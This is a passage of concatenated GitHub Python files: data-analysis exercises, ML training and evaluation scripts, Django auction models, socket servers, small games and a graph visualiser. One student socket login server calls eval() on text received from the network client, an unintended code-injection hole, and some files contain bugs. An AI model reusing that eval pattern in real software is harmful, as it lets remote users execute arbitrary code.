maximum WoC sum. \n # it return the index or key of maximum value from pandas series\n best_pubisher = publisher_stats.idxmax()\n\n # now we extract data frame of the best publisher from the original top40UK\n best_pubisher_record = top40UK[top40UK['Publisher'] == best_pubisher]\n \n return best_pubisher_record\n\ndef main():\n best_record_company()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Zumh/dataAnalysis2023","sub_path":"part05-e05_best_record_company/src/best_record_company.py","file_name":"best_record_company.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31485818134","text":"import argparse\n\nimport os\nimport torch\nimport torch.nn.functional as F\nimport torchvision.transforms as T\n\nimport yaml\nfrom torchvision.transforms.functional import InterpolationMode\n\nfrom data.coco_data import CocoDataModule\nfrom data.voc_data import VOCDataModule\nfrom model.align_model import AlignSegmentor\nfrom utils import PredsmIoU\n\n\ndef norm(t):\n return F.normalize(t, dim=-1, eps=1e-10)\n\n\ndef eval_overcluster():\n with open(args.config_path) as file:\n config = yaml.safe_load(file.read())\n # print('Config: ', config)\n\n data_config = config['data']\n val_config = config['val']\n input_size = data_config[\"size_crops\"]\n torch.manual_seed(val_config['seed'])\n torch.cuda.manual_seed_all(val_config['seed'])\n\n # Init data and transforms\n val_image_transforms = T.Compose([T.Resize((input_size, input_size)),\n T.ToTensor(),\n T.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])])\n val_target_transforms = T.Compose([T.Resize((input_size, input_size), interpolation=InterpolationMode.NEAREST),\n T.ToTensor()])\n\n data_dir = data_config[\"data_dir\"]\n dataset_name = data_config[\"dataset_name\"]\n if dataset_name == \"voc\":\n ignore_index = 255\n num_classes = 21\n data_module = VOCDataModule(batch_size=val_config[\"batch_size\"],\n return_masks=True,\n num_workers=config[\"num_workers\"],\n train_split=\"trainaug\",\n val_split=\"val\",\n data_dir=data_dir,\n 
train_image_transform=None,\n drop_last=True,\n val_image_transform=val_image_transforms,\n val_target_transform=val_target_transforms)\n elif \"coco\" in dataset_name:\n assert len(dataset_name.split(\"-\")) == 2\n mask_type = dataset_name.split(\"-\")[-1]\n assert mask_type in [\"all\", \"stuff\", \"thing\"]\n if mask_type == \"all\":\n num_classes = 27\n elif mask_type == \"stuff\":\n num_classes = 15\n elif mask_type == \"thing\":\n num_classes = 12\n ignore_index = 255\n file_list = os.listdir(os.path.join(data_dir, \"images\", \"train2017\"))\n file_list_val = os.listdir(os.path.join(data_dir, \"images\", \"val2017\"))\n # random.shuffle(file_list_val)\n data_module = CocoDataModule(batch_size=val_config[\"batch_size\"],\n num_workers=config[\"num_workers\"],\n file_list=file_list,\n data_dir=data_dir,\n file_list_val=file_list_val,\n mask_type=mask_type,\n train_transforms=None,\n val_transforms=val_image_transforms,\n val_target_transforms=val_target_transforms)\n elif dataset_name == \"ade20k\":\n num_classes = 111\n ignore_index = 255\n val_target_transforms = T.Compose([T.Resize((input_size, input_size), interpolation=InterpolationMode.NEAREST)])\n data_module = None\n else:\n raise ValueError(f\"{dataset_name} not supported\")\n\n # Init method\n patch_size = val_config[\"patch_size\"]\n spatial_res = input_size / patch_size\n assert spatial_res.is_integer()\n model = AlignSegmentor(arch=val_config['arch'],\n patch_size=val_config['patch_size'],\n embed_dim=val_config['embed_dim'],\n hidden_dim=val_config['hidden_dim'],\n num_heads=val_config['decoder_num_heads'],\n num_queries=val_config['num_queries'],\n num_decode_layers=val_config['num_decode_layers'],\n last_self_attention=val_config['last_self_attention'])\n\n # set model to eval mode\n for p in model.parameters():\n p.requires_grad = False\n model.eval()\n model.to(cuda)\n\n # load pretrained weights\n if val_config[\"checkpoint\"] is not None:\n checkpoint = torch.load(val_config[\"checkpoint\"])\n msg = model.load_state_dict(checkpoint[\"state_dict\"], strict=True)\n print(msg)\n else:\n print('no pretrained pth found!')\n\n dataloader = data_module.val_dataloader()\n metric = PredsmIoU(val_config['num_queries'], num_classes)\n\n # Calculate IoU for each image individually\n for idx, batch in enumerate(dataloader):\n imgs, masks = batch\n B = imgs.size(0)\n assert B == 1 # image has to be evaluated individually\n all_queries, tokens, _, _, res, _ = model([imgs.to(cuda)]) # tokens=(1,N,dim)\n\n # calculate token assignment\n token_cls = torch.einsum(\"bnc,bqc->bnq\", norm(tokens), norm(all_queries[0]))\n token_cls = torch.softmax(token_cls, dim=-1)\n token_cls = token_cls.reshape(B, res, res, -1).permute(0, 3, 1, 2) # (1,num_query,res,res)\n token_cls = token_cls.max(dim=1, keepdim=True)[1].float() # (1,1,res,res)\n\n # downsample masks/upsample preds to masks_eval_size\n preds = F.interpolate(token_cls, size=(val_config['mask_eval_size'], val_config['mask_eval_size']), mode='nearest')\n masks *= 255\n if masks.size(3) != val_config['mask_eval_size']:\n masks = F.interpolate(masks, size=(val_config['mask_eval_size'], val_config['mask_eval_size']), mode='nearest')\n\n metric.update(masks[masks != ignore_index], preds[masks != ignore_index])\n # sys.exit(1)\n\n metric.compute()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--config_path', default='../configs/eval_voc_config.yml', type=str)\n parser.add_argument('--gpu', default='0', type=str)\n\n args = 
parser.parse_args()\n\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = str(args.gpu)\n cuda = torch.device('cuda')\n eval_overcluster()\n","repo_name":"yliu1229/AlignSeg","sub_path":"evaluate/sup_overcluster.py","file_name":"sup_overcluster.py","file_ext":"py","file_size_in_byte":6231,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"72961083562","text":"import glob\nimport time\nimport pickle\nimport random\nimport cv2 as cv\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\n\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPooling2D\n\n## --------------------------------------------\n\nnegative_dir = glob.glob('dataset/negative/*.png')\npositive_dir = glob.glob('dataset/positive/*.png')\n\nplane = []\nnot_plane = []\nlabel = []\n\nfor image in negative_dir:\n not_plane.append(image)\n label.append(0)\n\nfor image in positive_dir:\n plane.append(image)\n label.append(1)\n\nprint(\"# of not_plane:\\t\", len(not_plane))\nprint(\"# of plane:\\t\", len(plane))\n## --------------------------------------------\n\nX = not_plane + plane\ny = np.array(label)\ny = y.reshape(y.shape[0],1)\n\nassert len(X)==len(y), \"mismatch in data and label size\"\n\n# ## Exploratory data\n# for _ in range(5):\n# n = random.randint(0, len(X)-1)\n# img_ = plt.imread(X[n])\n# label_ = \"Exploratory data\\n\" + (\"plane\" if y[n] else \"not plane\")\n# plt.imshow(img_)\n# plt.title(label_)\n# plt.show()\n## --------------------------------------------\n\n## convert to grayscale and flatten data\ndef gryImages(images):\n gry_images = []\n for x in images:\n img = cv.imread(x)\n img = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n gry_images.append(img)\n return gry_images\n\nX = np.array(gryImages(X))\n\n## --------------------------------------------\n\nX = X.reshape(X.shape[0], X.shape[1], X.shape[2], 1)\ninput_shape = (X.shape[1], X.shape[2], 1)\n## --------------------------------------------\n\n## train test split\nrand_state = np.random.randint(0, 100)\nX_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=0.3, random_state=rand_state)\n## --------------------------------------------\nX_train = X_train.astype('float32')\nX_test = X_test.astype('float32')\n## normalize\nX_train /= 255\nX_test /= 255\nprint()\nprint(X_train.shape[0], 'train samples')\nprint(X_test.shape[0], 'test samples')\n\nnum_classes = 2\ny_train = keras.utils.to_categorical(y_train, num_classes)\ny_test = keras.utils.to_categorical(y_test, num_classes)\n##------------------------------------------------\n\nbatch_size = 128\nepochs = 12\n\nmodel = Sequential()\nmodel.add(Conv2D(32, kernel_size=(3, 3),\n activation='relu',\n input_shape=input_shape))\nmodel.add(Conv2D(64, (3, 3), activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.25))\nmodel.add(Flatten())\nmodel.add(Dense(128, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(num_classes, activation='softmax'))\n\nmodel.compile(loss=keras.losses.categorical_crossentropy,\n optimizer=keras.optimizers.Adadelta(),\n metrics=['accuracy'])\n\nmodel.fit(X_train, y_train,\n batch_size=batch_size,\n epochs=epochs,\n verbose=1,\n validation_data=(X_test, y_test))\n\nscore = model.evaluate(X_test, y_test, verbose=0)\n\nprint('Test loss:', score[0])\nprint('Test accuracy:', score[1])\n\n## -------------------------------------------------------------------\n# save model\nmodel_name 
= \"./models/lenet_like_model.h5\"\nmodel.save(model_name)\n","repo_name":"askmuhsin/airplane_classifier","sub_path":"cnn_classifier.py","file_name":"cnn_classifier.py","file_ext":"py","file_size_in_byte":3259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"5448213472","text":"# 1.简述二层交换机 & 路由器 & 三层交换机的作用。\r\n'''\r\n二层交换机能维护接口和地址\r\n路由器可以叫交换机连接在一起,从而连接到另一个二层交换机\r\n三层交换机继承了二层交换机和路由器的功能\r\n'''\r\n# 2.简述常见词:IP、子网掩码、DHCP、公网IP、端口、域名的作用。\r\n'''\r\nIP:IP是一个32位的二进制,方便记忆将其分为4组,每组8位,转换为十进制最大为255.255.255.255,又分为网络IP和主机IP\r\n子网掩码:被子网掩码掩盖的IP是网络IP,二进制数都是1,剩余的是主机IP,\r\nDHCP:提供连接到不同的路由器会自动设置IP、子网掩码、网关的功能\r\n端口:IP后面加端口可以访问指定的网页\r\n域名:由于IP和端口太难记忆,域名可以绑定IP对应的端口,方便记忆\r\n'''\r\n\r\n# 3.实现远程用户认证系统。\r\n\r\n\r\n# 服务端:\r\n# 1.客户端连接上服务端,返回欢迎使用xx系统信息。\r\n# 2.等待客户端发送用户名和密码进行校验(用户名和密码在文件中)\r\n# 3.登录失败,返回错误信息。\r\n# 4.登录成功,返回成功提示的内容。\r\n\r\nimport socket\r\n\r\nlst = [{'用户名': '10010', '密码': '123456'}, {'用户名': '10086', '密码': '1111'}]\r\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # 配置,创建sock对象\r\nsock.bind(('127.0.0.1', 8001)) # 固定IP以及端口\r\nsock.listen(5)\r\nconn, addr = sock.accept() # 等待用户端连接,接收连接\r\nconn.sendall('欢迎使用登录系统'.encode('utf-8')) # 连接成功返回提示信息\r\nclient_info = conn.recv(1024) # 接收客户端发来的信息\r\nclient_info = client_info.decode('utf-8') # 将二进制转换为utf-8\r\nprint(client_info)\r\nif not client_info:\r\n print('系统关闭')\r\n conn.close()\r\nelse:\r\n for i in lst:\r\n if eval(client_info) == i: # eval()将字符串转换成字典\r\n conn.sendall('登录成功'.encode('utf-8'))\r\n break\r\n else:\r\n conn.sendall('账号或密码输入错误'.encode('utf-8'))\r\n\r\n conn.close()\r\n","repo_name":"RobatPlayer/python_note","sub_path":"03 面向对象/04 网络编程/作业/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74472544684","text":"import sys\n\ndef binary_search(start, end, find, arr):\n if start > end:\n return -1\n\n mid = (start + end) // 2\n\n if arr[mid] == find:\n return mid\n elif arr[mid] < find:\n return binary_search(mid + 1, end, find, arr)\n else:\n return binary_search(start, mid - 1, find, arr)\n\ndef search_front_back(index, arr, find):\n count = 0\n length = len(arr)\n back_index = index + 1\n while index > -1 and arr[index] == find:\n index -= 1\n count += 1\n\n while back_index < length and arr[back_index] == find:\n back_index += 1\n count += 1\n\n return count\n\n# 입력 처리\nn = int(sys.stdin.readline())\narr = list(map(int, sys.stdin.readline().split()))\n\nfind_n = int(sys.stdin.readline())\nfind_arr = list(map(int, sys.stdin.readline().split()))\n\nfor i in range(find_n):\n # 이진 탐색으로 해당 숫자 위치 찾고\n index = binary_search(0, n - 1, find_arr[i], arr)\n # 양 옆에 같은 숫자 탐색\n count = search_front_back(index, arr, find_arr[i])\n print(count, end=' ')\n","repo_name":"ddosang/AlgorithmStudy","sub_path":"+/4. 숫자 카운팅.py","file_name":"4. 
숫자 카운팅.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35682670055","text":"from django import forms\nfrom django.contrib.auth.forms import UserCreationForm, AuthenticationForm\nfrom django.contrib.auth.models import User\n\n\nclass ClimbForm(forms.Form):\n climb = forms.CharField(\n label='Name/Location', max_length=240\n )\n difficulty = forms.CharField(\n label='Difficulty', max_length=10\n )\n\n CHOICES = ((0, 'Indoor'), (1, 'Outdoor'))\n outdoor_bool = forms.TypedChoiceField(\n label=\"Climbing type\", choices=CHOICES, widget=forms.RadioSelect, coerce=int\n )\n\n climb_notes = forms.CharField(\n label='Notes:', max_length=240, required=False\n )\n\nclass searchForm(forms.Form):\n climbType = forms.CharField(\n label=\"Find a climb\", max_length=50\n )\n\nclass CommentForm(forms.Form):\n comment = forms.CharField(\n label='Comment', max_length=240\n )\n\n#get new user\nclass RegistrationForm(UserCreationForm):\n email = forms.EmailField(\n label=\"Email\",\n required=True\n )\n\n class Meta:\n model = User\n fields = (\"username\", \"email\",\n \"password1\", \"password2\")\n\n def save(self, commit=True):\n user = super(RegistrationForm,self).save(commit=False)\n user.email = self.cleaned_data[\"email\"]\n if commit:\n user.save()\n return user\n","repo_name":"mmichelon/ClimbProject","sub_path":"climbproject/climbapp/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73852783083","text":"import sys\ninput = sys.stdin.readline\n\ndef func(cases : list, pays : list, choose : list):\n lastJob = -1\n if len(choose) > 0 :\n lastJob = choose[len(choose) - 1]\n day = lastJob + cases[lastJob][0] if lastJob != -1 else 0\n \n plus = False\n for i in range(day, len(cases)):\n if i + cases[i][0] <= len(cases):\n plus = True\n choose.append(i)\n func(cases, pays, choose)\n choose.pop()\n if day == len(cases) or not plus:\n pay = 0\n for i in choose:\n pay += cases[i][1]\n pays.append(pay)\n\nif __name__ == \"__main__\":\n num = int(input())\n cases = []\n pays = []\n for _ in range(num):\n day, pay = map(int, input().split())\n cases.append([day, pay])\n func(cases, pays, [])\n print(max(pays))","repo_name":"HyunwooKoh/CodingTest","sub_path":"baekjoon/silver3/sol_14501.py","file_name":"sol_14501.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"11205485970","text":"from kafka import KafkaConsumer\nimport time\nimport base64\nimport cv2\n\nfrom utils import str_to_mat\nfrom notify import *\n\nlast_print = dict()\ndef write_image(img, name):\n img = str_to_mat(img.encode())\n cv2.imwrite(name, img)\n\n\ndef append_to_file(msg, img, conf):\n if msg not in last_print:\n last_print[msg] = 0\n t = time.time()\n img_name = \"log_img/\" + str(int(t * 10)) + '.jpg'\n write_image(img, img_name)\n file = open('log.out', 'a')\n file.write('%s,%s,%s,%s\\n'%(t, msg, img_name, conf))\n file.close()\n send_notification(msg)\n print(\"Done: \", t - last_print[msg])\n last_print[msg] = t\n\n\n# consumer = KafkaConsumer('notification', auto_offset_reset='earliest')\nconsumer = KafkaConsumer('notification')\n\nfor record in consumer:\n arr = record.value.decode().split(',')\n print(\"message: \" + arr[0])\n append_to_file(arr[0], arr[1], 
arr[2])\n","repo_name":"mostafa-elrosasy/surveillance-ml","sub_path":"Logger.py","file_name":"Logger.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74869874924","text":"from django.contrib.auth.models import User\nfrom django.db import models\nfrom django.conf import settings\nfrom django.db.models.deletion import CASCADE, SET_NULL\nfrom django.db.models import Max, F, Q\nfrom django.db.models.fields.related import ForeignKey\nfrom django.conf import settings\nfrom django.utils import timezone\n\nclass Antique(models.Model):\n name = models.CharField(max_length=255)\n description = models.TextField(blank=True)\n \n\nclass Auction(models.Model):\n start_date = models.DateTimeField()\n end_date = models.DateTimeField()\n\n @property\n def remaining_time(self):\n now = timezone.now()\n rt = self.end_date - now\n return rt\n\n\nclass AuctionItem(models.Model):\n auction = models.ForeignKey(\n Auction,\n related_name='items',\n on_delete=models.CASCADE\n )\n antique = models.OneToOneField(Antique, on_delete=models.CASCADE)\n base_price = models.DecimalField(\n max_digits = 14, \n decimal_places=2, \n default=0.00\n )\n @property\n def current_price(self):\n current_highest = Bid.objects.aggregate(Max('price'))['price__max'] \n if current_highest is None: # no bid placed \n return self.base_price\n return current_highest\n\n\nclass Bid(models.Model):\n auction_item = models.ForeignKey(\n AuctionItem, \n on_delete=models.CASCADE,\n related_name=\"bids\"\n )\n price = models.DecimalField(\n max_digits = 14, \n decimal_places=2, \n default=0.00\n )\n bidder = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)\n date_placed = models.DateTimeField(auto_now_add=True)\n auto_bidding = models.BooleanField(default=False)\n\n @classmethod\n def get_user_highest(cls, user, item):\n highest = cls.objects.filter(\n bidder=user,\n auction_item=item\n ).aggregate(Max('price'))['price__max']\n\n return 0 if highest is None else highest\n\n\n\nclass AutoBid(models.Model):\n \"\"\"\n Represents the AutoBid Bot and Configuration \n Settings\n \"\"\"\n max_amount = models.DecimalField(\n max_digits = 14, \n decimal_places=2, \n default=0.00\n )\n\n used_amount = models.DecimalField(\n max_digits = 14, \n decimal_places=2, \n default=0.00\n )\n user = models.OneToOneField(User, on_delete=CASCADE)\n\n @property\n def remaining_amount(self):\n return self.max_amount - self.used_amount\n\n\n @staticmethod\n def outbid(bid):\n qs0 = Bid.objects.annotate(\n funds_remaining=F('bidder__autobid__max_amount') - F('bidder__autobid__used_amount')\n ).filter(\n Q(auction_item=bid.auction_item) &\n Q(auto_bidding=True) &\n Q(funds_remaining__gte=settings.AUTO_BIDDING_STEP) \n ).exclude( \n bidder=bid.bidder\n )\n if qs0.exists():\n qs0.update(\n price=F('price') + settings.AUTO_BIDDING_STEP\n ) \n qs1 = User.objects.filter(bid__in=qs0)\n\n AutoBid.objects.filter(user__in=qs1).update(\n used_amount=F('used_amount') + settings.AUTO_BIDDING_STEP\n )\n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n # update deals with concurrency issues(see taken screenshot)\n\n # qs = bid.auction_items.bids.exclude(\n # bidder=bid.bidder\n # ).filter(\n # auto_bidding) \n \n # if qs.exists():\n # qs.update(\n # price=F('price') + 1\n # 
)\n","repo_name":"dilonne/auction_app","sub_path":"rest_api/auction/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3630,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"827495394","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 15 10:34:36 2018\n\n@author: Vipul\n\"\"\"\n\nimport os\nfor root, dirs, files in os.walk(\"./new-folder\", topdown = True):\n \n for filename in files:\n # print(os.path.join(root, filename))\n print(\"FILE: \" + filename)\n \n for dirname in dirs:\n print(\"DIRECTORY: \" + dirname)","repo_name":"qwertyvipul/python","sub_path":"noob/archive/scan-directory.py","file_name":"scan-directory.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"24636287436","text":"import socket\nimport json\nimport os\nfrom Filter import ImageFilter\n\nclass Processing_Server():\n def __init__(self, address: str, port: int, broker_port: int = 2000, max_attempts: int = 3) -> None:\n self.socket_server = socket.socket()\n self.hasBroker = False\n self.address = address\n self.port = port\n self.broker_port = broker_port\n self.max_attempts = max_attempts\n self.current_images = 0\n\n if(self.port == self.broker_port):\n raise ValueError(\"El puerto asignado al servidor de procesamiento no puede ser el mismo que el del servidor broker\")\n\n def listen(self) -> None:\n self.socket_server.bind((self.address, self.port))\n self.socket_server.listen()\n\n print(f\"Servidor de procesamiento @ {self.address}:{self.port} iniciado\")\n\n while True:\n conn, address = self.socket_server.accept()\n\n print(f\"Nueva conexión de {address}\")\n print(\"Manejando conexión\")\n\n continue_listening = False\n decoded_json = b\"\"\n extra_data = b\"\"\n extra_data_size = 0\n processed_images = 0\n\n while True:\n buffer = conn.recv(1024)\n recieved_bytes = len(buffer)\n\n if(not decoded_json):\n # El JSON nunca será mayor a 1024 bytes \n decoded_json = json.loads(buffer)\n\n continue_listening = True if decoded_json['message'] == 'CONTINUE' else False\n self.current_images = decoded_json['images']\n\n if(continue_listening):\n conn.send(b'1')\n else:\n break\n\n continue\n if(continue_listening):\n if(not extra_data_size):\n extra_data_size = int.from_bytes(buffer, 'little')\n conn.send(b'1')\n else:\n if(extra_data_size >= 0):\n extra_data += buffer\n extra_data_size -= recieved_bytes\n # El protocolo debe avisar cuando haya terminado de leer el archivo enviado\n # para que el broker mande la siguiente imagen\n if(extra_data_size <= 0):\n img_procesar = open(f'PROCESAR_{self.port}/IMG_{processed_images}.jpg', 'wb')\n img_procesar.write(extra_data)\n \n extra_data = b''\n extra_data_size = 0\n\n conn.send(b'1')\n processed_images += 1\n # El protocolo debe avisar cuando haya terminado de leer todas las imagenes\n # para que el broker espere la respuesta\n if(processed_images == self.current_images):\n conn.send(b'2')\n break\n\n if(isinstance(decoded_json, dict)):\n self.manejar_imagenes(conn)\n\n # Indicar al broker que ya se terminaron de procesar las imagenes y que se va a proceder a enviarlas\n conn.send(json.dumps({\"type\": \"PROCESSING_COMPLETE\", \"message\":\"CONTINUE\", \"IMAGES\": self.current_images}).encode('ASCII'))\n\n # Esperar a que el servidor broker indique que está listo para recibir las imagenes\n should_continue = conn.recv(1024)\n\n if(should_continue):\n for item in 
os.listdir(f'PROCESAR_{self.port}/Filtros/'):\n                    if(os.path.isfile(f\"PROCESAR_{self.port}/Filtros/{item}\")):\n                        filesize = os.path.getsize(f'PROCESAR_{self.port}/Filtros/{item}')\n                        conn.send(filesize.to_bytes(8, 'little'))\n\n                        should_send = conn.recv(1024)\n\n                        if(should_send):\n                            for byte in open(item, 'rb'):\n                                conn.send(byte)\n            conn.close()\n    \n    def manejar_imagenes(self, socket: socket.socket):\n        for i in range(self.current_images):\n            ImageFilter(f'PROCESAR_{self.port}')\n\n    def searchBroker(self) -> bool:\n        print(f\"Searching for the broker server @ localhost:{self.broker_port}\")\n        print(f\"{self.max_attempts} connection attempts will be made\")\n\n        attempts = 0\n        socket_client = socket.socket()\n\n        while (attempts < self.max_attempts):\n            try:\n                socket_client.connect(('localhost', self.broker_port))\n                request_json = {\"type\": \"NODE_CONNECT\", \"message\": self.port}\n\n                socket_client.send(json.dumps(request_json).encode('ASCII'))\n\n                response = socket_client.recv(1024)\n                \n                try:\n                    response = json.loads(response)\n\n                    if(response['type'] == 'NODE_CONNECTED'):\n                        socket_client.close()\n                        return True\n                    if(response['type'] == 'NODE_EXISTS'):\n                        print(f\"A processing server with port {self.port} already exists\")\n                        raise ValueError\n                except:\n                    continue\n            except:\n                print(\"Failed to connect to the broker server\")\n                attempts += 1\n\n        socket_client.close()\n        return False\n\n    def kill(self) -> None:\n        self.socket_server.close()\n\nif __name__ == '__main__':\n    s = Processing_Server('localhost', 9560)\n    \n    if(s.searchBroker()):\n        print(\"Connected to the broker server\")\n        s.listen()\n    else:\n        print(\"All connection attempts to the broker failed\")\n        s.kill()\n","repo_name":"ZUCHOVICKI/ClusterASD","sub_path":"processing_server.py","file_name":"processing_server.py","file_ext":"py","file_size_in_byte":5910,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"29259049746","text":"from django import forms\nfrom .models import Assignment\nfrom .models import Assignment, AssignmentApplication\n\nclass AssignmentForm(forms.ModelForm):\n    class Meta:\n        model = Assignment\n        fields = ['title', 'description', 'price', 'due_date', 'category']\n        widgets = {\n            'due_date': forms.DateInput(attrs={'type': 'date'}),\n        }\nclass AssignmentApplicationForm(forms.ModelForm):\n    class Meta:\n        model = AssignmentApplication\n        fields = ['proposal', 'bid_amount']\n","repo_name":"Osten338/Marketplace-for-jurister","sub_path":"marketplace/jurrmarketplace/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2482733094","text":"from tkinter import *\nfrom tkinter.messagebox import showerror\n\n\ndef point_delete(window, listb_f_set, listb_s_set):\n    listb_f_cursel = listb_f_set.curselection()\n    listb_s_cursel = listb_s_set.curselection()\n\n    try:\n        if len(listb_f_cursel) == 0:\n            listb_s_set.delete(listb_s_cursel)\n        else:\n            listb_f_set.delete(listb_f_cursel)\n    except:\n        showerror(\"Error\", \"Select the point's coordinates to delete them\")\n","repo_name":"Untouchabl3Pineapple/iu7-cg","sub_path":"lab_01/src/point_del.py","file_name":"point_del.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"2009917243","text":"import random\nrock = '''\n    _______\n---'   ____)\n      (_____)\n      (_____)\n      (____)\n---.__(___)\n'''\n\npaper = '''\n    _______\n---'   
____)____\n          ______)\n          _______)\n          _______)\n---.__________)\n'''\n\nscissors = '''\n    _______\n---'   ____)____\n          ______)\n       __________)\n      (____)\n---.__(___)\n'''\n\n#Write your code below this line 👇\n\nlijst = [rock, paper, scissors]\nrandom = random.randint(0, 2)\noptie = int(input(\"Make a choice: \\n1) Rock\\n2) Paper\\n3) Scissors\\n\"))\nif optie > 3 or optie < 1:\n    print(\"Please enter a valid input.\")\n    exit()\ncomputer_keus = lijst[random]\ngebruiker_keus = lijst[optie -1]\n\n#win\nprint(f\"You selected {gebruiker_keus}\")\nprint(f\"The computer chose {computer_keus}\")\nif gebruiker_keus == rock and computer_keus == scissors or gebruiker_keus == paper and computer_keus == rock or gebruiker_keus == scissors and computer_keus == paper:\n    print(\"You win!\")\n#lose\nelif gebruiker_keus == rock and computer_keus == paper or gebruiker_keus == paper and computer_keus == scissors or gebruiker_keus == scissors and computer_keus == rock:\n    print(\"You lose!\")\n#draw\nelse:\n    print(\"It's a draw!\")\n\n\n","repo_name":"erikluckycraft/100-dagen-cursus","sub_path":"dag 4.py","file_name":"dag 4.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"nl","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"37789112289","text":"\n# -------------------------------------------------------------------\n# Andrew Morato\n# CS 631 Term Project\n# May 5, 2020\n# Undirected Weighted Graph Visualizer\n# -------------------------------------------------------------------\n\n'''\n\n  Code to display an undirected, weighted graph using opencv.\n  Accepts graphs comprised of Node and Edge objects of the form:\n\n    [s][v1][v2][v3][s]...[vn][e]\n\n  where s is the source node, v1, v2, v3, ..., vn are groups of\n  Node objects with edges connecting to the previous and next\n  groups, t is the sink node, and [e] is the group of all Edge\n  objects. The graph is displayed by drawing all vertices from\n  each group in their own \"column\" and connecting edges between all\n  drawn vertices. \n\n'''\n\n# Imports ---\n\nimport cv2\nimport numpy as np\nimport localsearch\n\n\n# Global Variables ---\n\n# Colors in BGR\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nBACKGROUND = (210, 210, 210)\nGRAY = (100, 100, 100)\nBLUE = (191, 114, 15)\nORANGE = (46, 125, 209)\nRED = (80, 53, 219)\nTEAL = (69, 133, 69)\n\n# Text and Image\nRAD = 20\nOFFSET = 5\nFONT = cv2.FONT_HERSHEY_SIMPLEX\nWINDOW = 200 #Window width for displaying information\n\n# Cost Tracking\nBEST_COST = 0\n\n# Mouse Position\nxPos, yPos = -1, -1\n\n# Interactive Visualizer ---\n\n# Displays an OpenCV image representation of the given graph. Creates\n# a blank image that will fit the graph and populates it with a\n# simple but adequate representation of the graph\n#\n# graph      Graph to visualize. 
Has the format described in this\n# file's description\n#\n# returns None\ndef visualize(graph):\n\tglobal xPos, yPos\n\n\t# set the vertex locations in the image\n\ttriplets, dim = set_vertex_locations(graph[0], WINDOW)\n\n\t# create a blank image\n\tImg = np.zeros(dim, np.uint8)\n\tImg[:] = BACKGROUND\n\n\t# draw the graph\n\tedges = graph[1]\n\tGraph = draw_graph(Img.copy(), triplets, edges)\n\n\t# seperate edges that join [A, B]\n\tE = [e for e in edges if e.n.group != e.m.group]\n\n\t# populate display window\n\tGraph = disp_window(Graph, WINDOW, E, \"Initial Randomized Graph\")\n\n\t# display\n\tcv2.namedWindow('graph')\n\tcv2.setMouseCallback('graph', on_mouse_clicked)\n\tcv2.imshow('graph', Graph)\n\n\twhile True:\n\n\t\t# exit the interactive display\n\t\tk = cv2.waitKey(5) & 0xFF\n\t\tif k == 27 or k == ord('q'):\n\t\t\tbreak\n\n\t\t# mouse clicked, handle user input\n\t\tif xPos != -1:\n\n\t\t\t# determine where the click occured and handle each case\n\t\t\tcode = check_location(triplets, xPos, yPos)\n\n\t\t\t# Mouse click location is not in a Node\n\t\t\tif code == -4:\n\t\t\t\tmsg = \"Clicked empty space\"\n\n\t\t\t# Mouse click location is in the Source (unswitchable)\n\t\t\telif code == -3:\n\t\t\t\tmsg = \"Selected source vertex\"\n\n\t\t\t# Mouse click location is in the Sink (unswitchable)\n\t\t\telif code == -2:\n\t\t\t\tmsg = \"Selected sink vertex\"\n\n\t\t\t# Mouse click location is another unswitchable Node\n\t\t\telif code == -1:\n\t\t\t\tmsg = \"Selected unflippable vertex\"\n\n\t\t\t# Mouse click location is in a valid Node with that ID \n\t\t\telif code >= 0:\n\t\t\t\tmsg = 